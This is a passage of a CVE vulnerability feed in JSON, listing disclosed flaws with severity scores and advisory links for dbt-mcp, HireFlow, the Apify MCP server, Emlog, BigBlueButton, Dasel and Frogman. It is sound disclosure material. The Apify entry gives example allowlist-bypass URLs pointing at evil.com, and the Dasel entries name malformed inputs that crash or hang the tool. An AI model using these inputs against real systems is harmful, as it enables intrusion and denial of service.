1.17.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.0,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T18:09:55.096349Z","id":"CVE-2026-44968","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-88"}]}],"references":[{"url":"https://github.com/dbt-labs/dbt-mcp/commit/6534507b5e7a729758d5baece155602cad0bb22f","source":"security-advisories@github.com"},{"url":"https://github.com/dbt-labs/dbt-mcp/pull/752","source":"security-advisories@github.com"},{"url":"https://github.com/dbt-labs/dbt-mcp/releases/tag/v1.17.1","source":"security-advisories@github.com"},{"url":"https://github.com/dbt-labs/dbt-mcp/security/advisories/GHSA-xpww-f6pm-cfhq","source":"security-advisories@github.com"},{"url":"https://github.com/dbt-labs/dbt-mcp/security/advisories/GHSA-xpww-f6pm-cfhq","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-44969","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T18:16:43.247","lastModified":"2026-07-17T19:17:14.040","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"dbt-mcp is a Model Context Protocol server for interacting with dbt. Prior to 1.17.1, DbtMCP.call_tool() in src/dbt_mcp/mcp/server.py logged the raw arguments dictionary at INFO level before each tool call and at ERROR level on exceptions, and configure_file_logging() wrote those records to dbt-mcp.log when DBT_MCP_SERVER_FILE_LOGGING=true, preserving sensitive sql_query, vars, and node_selection values in plaintext without automatic rotation or deletion. This issue is fixed in version 1.17.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"dbt-labs","product":"dbt-mcp","versions":[{"version":"< 1.17.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":2.5,"baseSeverity":"LOW","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.0,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:18:39.143169Z","id":"CVE-2026-44969","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-532"}]}],"references":[{"url":"https://github.com/dbt-labs/dbt-mcp/commit/6534507b5e7a729758d5baece155602cad0bb22f","source":"security-advisories@github.com"},{"url":"https://github.com/dbt-labs/dbt-mcp/pull/752","source":"security-advisories@github.com"},{"url":"https://github.com/dbt-labs/dbt-mcp/releases/tag/v1.17.1","source":"security-advisories@github.com"},{"url":"https://github.com/dbt-labs/dbt-mcp/security/advisories/GHSA-7xgw-6qf3-7w59","source":"security-advisories@github.com"},{"url":"https://github.com/dbt-labs/dbt-mcp/security/advisories/GHSA-7xgw-6qf3-7w59","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-45336","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T18:16:43.517","lastModified":"2026-07-17T19:17:14.687","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HireFlow is a web-based interview management system for managing candidates, scheduling interviews, and tracking hiring progress. In 1.2 and earlier, app.py assigns a hard-coded Flask secret_key used to sign session cookies, allowing unauthenticated attackers who know the public source value to forge cookies containing role=admin and user_id values and bypass authentication. The advisory lists version 1.3 as fixed."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"StratonWebDesigners","product":"HireFlow","versions":[{"version":"< 1.3","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L","baseScore":10.0,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":6.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:16:36.973926Z","id":"CVE-2026-45336","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-798"}]}],"references":[{"url":"https://github.com/StratonWebDesigners/HireFlow/releases/tag/v1.3","source":"security-advisories@github.com"},{"url":"https://github.com/StratonWebDesigners/HireFlow/security/advisories/GHSA-x53g-jr84-jrv5","source":"security-advisories@github.com"},{"url":"https://github.com/StratonWebDesigners/HireFlow/security/advisories/GHSA-x53g-jr84-jrv5","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-46341","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T18:16:43.913","lastModified":"2026-07-17T18:44:13.257","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The Apify MCP server enables AI agents to extract data from websites using ready-made scrapers, crawlers, and automation tools available on the Apify Store. Prior to 0.9.21, the fetch-apify-docs tool in src/tools/common/fetch_apify_docs.ts validates allowlisted documentation domains with String.startsWith() rather than URL hostname comparison, allowing attacker-controlled URLs such as `https://docs.apify.com.evil.com/` and `https://docs.apify.com@evil.com/` to pass the ALLOWED_DOC_DOMAINS check and return arbitrary fetched content to the LLM. This issue is fixed in version 0.9.21."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"apify","product":"apify-mcp-server","versions":[{"version":"< 0.9.21","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:01:40.675260Z","id":"CVE-2026-46341","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-20"},{"lang":"en","value":"CWE-183"}]}],"references":[{"url":"https://github.com/apify/apify-mcp-server/commit/e39bdee530da1db0b3b3d3713558b33c9608e629","source":"security-advisories@github.com"},{"url":"https://github.com/apify/apify-mcp-server/pull/781","source":"security-advisories@github.com"},{"url":"https://github.com/apify/apify-mcp-server/releases/tag/v0.9.21","source":"security-advisories@github.com"},{"url":"https://github.com/apify/apify-mcp-server/security/advisories/GHSA-jwp7-wg77-3w9v","source":"security-advisories@github.com"},{"url":"https://github.com/apify/apify-mcp-server/security/advisories/GHSA-jwp7-wg77-3w9v","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-46686","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T18:16:44.063","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Emlog is an open source website building system. In 2.6.13 and earlier, the admin backend user search module's keyword parameter from admin/user.php is processed with addslashes but not HTML-escaped before being rendered into the value attribute in admin/views/user.php, allowing reflected cross-site scripting in an administrator's backend session. No fixed version is currently identified."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"emlog","product":"emlog","versions":[{"version":"<= 2.6.13","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T17:52:54.907535Z","id":"CVE-2026-46686","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://github.com/emlog/emlog/security/advisories/GHSA-3h87-c3m2-jpj9","source":"security-advisories@github.com"},{"url":"https://github.com/emlog/emlog/security/advisories/GHSA-3h87-c3m2-jpj9","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-46687","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T18:16:44.203","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Emlog is an open source website building system. In 2.6.13 and earlier, the article publishing interface stores a path-traversal template parameter from api_controller.php without validation, and log_controller.php later checks file_exists and calls include View::getView($template), allowing an authenticated author to include an arbitrary local .php file when an article is viewed. No fixed version is currently identified."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"emlog","product":"emlog","versions":[{"version":"<= 2.6.13","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T17:54:22.047061Z","id":"CVE-2026-46687","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-24"},{"lang":"en","value":"CWE-98"}]}],"references":[{"url":"https://github.com/emlog/emlog/security/advisories/GHSA-9h6g-q584-9vfg","source":"security-advisories@github.com"},{"url":"https://github.com/emlog/emlog/security/advisories/GHSA-9h6g-q584-9vfg","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-46338","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T19:16:45.733","lastModified":"2026-07-17T18:43:57.990","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"PyMdown Extensions is a set of extensions for the Python-Markdown markdown project. From 10.0.1 until 10.21.3, pymdownx.snippets uses a string-prefix containment check in SnippetPreprocessor.get_snippet_path() in pymdownx/snippets.py when `restrict_base_path: True`, allowing markdown snippet directives to read files from sibling paths that share the same base_path prefix, such as docs and docs_internal. This is a regression of CVE-2023-32309. This issue is fixed in version 10.21.3."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"facelessuser","product":"pymdown-extensions","versions":[{"version":">= 10.0.1, < 10.21.3","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:52:47.052382Z","id":"CVE-2026-46338","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"references":[{"url":"https://github.com/facelessuser/pymdown-extensions/commit/63b7835776d703d6c339cf2110d9888f676efc0c","source":"security-advisories@github.com"},{"url":"https://github.com/facelessuser/pymdown-extensions/releases/tag/10.21.3","source":"security-advisories@github.com"},{"url":"https://github.com/facelessuser/pymdown-extensions/security/advisories/GHSA-62q4-447f-wv8h","source":"security-advisories@github.com"},{"url":"https://github.com/facelessuser/pymdown-extensions/security/advisories/GHSA-62q4-447f-wv8h","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-46351","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T19:16:45.863","lastModified":"2026-07-17T18:36:41.143","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"BigBlueButton is an open-source virtual classroom. Prior to 3.0.21, bbb-web generated conference sessionToken values with insufficiently secure randomness in bbb-common-web/src/main/java/org/bigbluebutton/api/Util.java and bigbluebutton-web/grails-app/controllers/org/bigbluebutton/web/controllers/ApiController.groovy, allowing a session user to predict other users' conference session tokens and impersonate them. This issue is fixed in version 3.0.21."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"bigbluebutton","product":"bigbluebutton","versions":[{"version":"< 3.0.21","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:59:01.121165Z","id":"CVE-2026-46351","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-330"}]}],"references":[{"url":"https://github.com/bigbluebutton/bigbluebutton/commit/8457886c248aeba5597ee8749267602d6d117e98","source":"security-advisories@github.com"},{"url":"https://github.com/bigbluebutton/bigbluebutton/releases/tag/v3.0.21","source":"security-advisories@github.com"},{"url":"https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-7959-pf2v-xc4h","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-46353","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T19:16:46.000","lastModified":"2026-07-17T18:33:28.553","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"BigBlueButton is an open-source virtual classroom. Prior to 3.0.21, bbb-web checksum validation could be bypassed when a presentationUploadExternalUrl parameter was supplied to API request handling in CreateMeeting.java and ValidationService.java, allowing a user to send valid requests to some endpoints without a checksum. This issue is fixed in version 3.0.21."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"bigbluebutton","product":"bigbluebutton","versions":[{"version":"< 3.0.21","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:41:22.495125Z","id":"CVE-2026-46353","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-284"}]}],"references":[{"url":"https://github.com/bigbluebutton/bigbluebutton/commit/36fd1b407488a0c56ce620b91184d5a8aea68b3d","source":"security-advisories@github.com"},{"url":"https://github.com/bigbluebutton/bigbluebutton/releases/tag/v3.0.21","source":"security-advisories@github.com"},{"url":"https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-43hc-5g2m-cqff","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-46377","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T19:16:46.127","lastModified":"2026-07-17T18:33:28.553","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Dasel is a command-line tool and library for querying, modifying, and transforming data structures. From 3.0.0 until 3.10.1, the escape sequence handler in (*Tokenizer).parseCurRune in selector/lexer/tokenize.go increments past a trailing backslash in a quoted string such as \"\\ or '\\ and then reads p.src[pos] without a bounds check, allowing attacker-controlled selector strings to trigger a Go index-out-of-range panic. This issue is fixed in version 3.10.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"TomWright","product":"dasel","versions":[{"version":">= 3.0.0, < 3.10.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":6.2,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.5,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:21:25.556634Z","id":"CVE-2026-46377","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-129"}]}],"references":[{"url":"https://github.com/TomWright/dasel/commit/5fc1172287df89860caf139b146007d7ed12178c","source":"security-advisories@github.com"},{"url":"https://github.com/TomWright/dasel/releases/tag/v3.10.1","source":"security-advisories@github.com"},{"url":"https://github.com/TomWright/dasel/security/advisories/GHSA-m5j3-4634-c2vq","source":"security-advisories@github.com"},{"url":"https://github.com/TomWright/dasel/security/advisories/GHSA-m5j3-4634-c2vq","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-46378","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T19:16:46.260","lastModified":"2026-07-17T18:36:41.143","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Dasel is a command-line tool and library for querying, modifying, and transforming data structures. From 3.0.0 until 3.10.1, the selector lexer matchRegexPattern closure in (*Tokenizer).parseCurRune in selector/lexer/tokenize.go loops while tokenizing an unterminated regex literal such as r/ because peekRuneEqual returns false after the end of input, allowing attacker-controlled selector strings to consume CPU indefinitely. This issue is fixed in version 3.10.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"TomWright","product":"dasel","versions":[{"version":">= 3.0.0, < 3.10.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":6.2,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.5,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:06:25.761486Z","id":"CVE-2026-46378","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-835"}]}],"references":[{"url":"https://github.com/TomWright/dasel/commit/95f8dd3af12958bf6ca2a737b3ec0267280f86ed","source":"security-advisories@github.com"},{"url":"https://github.com/TomWright/dasel/security/advisories/GHSA-m6xr-fvfg-5g64","source":"security-advisories@github.com"},{"url":"https://github.com/TomWright/dasel/security/advisories/GHSA-m6xr-fvfg-5g64","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-46404","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T19:16:46.387","lastModified":"2026-07-17T19:17:14.923","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"BigBlueButton is an open-source virtual classroom. Prior to 3.0.23, the presentation URL validation did not properly restrict access to site local and link local addresses. The redirect following logic now pins resolved IPs. This issue is fixed in version 3.0.23."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"bigbluebutton","product":"bigbluebutton","versions":[{"version":"< 3.0.23","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N","baseScore":6.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":4.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:16:37.373798Z","id":"CVE-2026-46404","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://github.com/bigbluebutton/bigbluebutton/commit/7ccc60c965d744d9fb637715052352a1e59a2c27","source":"security-advisories@github.com"},{"url":"https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-xqm3-6q7q-4v5h","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-46513","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T19:16:46.640","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Frogman provides headless PBX control through MCP and HTTP API. Prior to 1.6.2, Frogman stored API tokens generated by Tools/CreateApiToken.php:33-36 as raw bin2hex(random_bytes(32)) strings in oc_api_tokens, and Frogman.class.php:78 authenticated the X-Frogman-Token header by comparing it with the stored raw value, allowing database read access to recover reusable active tokens at their assigned permission level, including admin. This issue is fixed in version 1.6.2."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"mwtcmi","product":"frogman","versions":[{"version":"< 1.6.2","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","baseScore":7.4,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:58:25.901633Z","id":"CVE-2026-46513","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-256"}]}],"references":[{"url":"https://github.com/mwtcmi/frogman/commit/b10f314add08c8e7585ba4b27d071b07d026ab55","source":"security-advisories@github.com"},{"url":"https://github.com/mwtcmi/frogman/releases/tag/v1.6.1","source":"security-advisories@github.com"},{"url":"https://github.com/mwtcmi/frogman/releases/tag/v1.6.2","source":"security-advisories@github.com"},{"url":"https://github.com/mwtcmi/frogman/security/advisories/GHSA-9xf5-9ghq-p6cw","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-46514","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T19:16:46.767","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Frogman provides headless PBX control through MCP and HTTP API. Prior to 1.6.2, fm_reset_password in Tools/ResetPassword.php:48-53 returned a plaintext password and fm_add_extension in Tools/AddExtension.php:172 returned a plaintext secret; Frogman.class.php:2207-2211 used auditOutcome to JSON-encode those responses into oc_audit_log.detail, allowing any PERM_READ caller with access to fm_audit_search to recover the stored credentials. This issue is fixed in version 1.6.2."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"mwtcmi","product":"frogman","versions":[{"version":"< 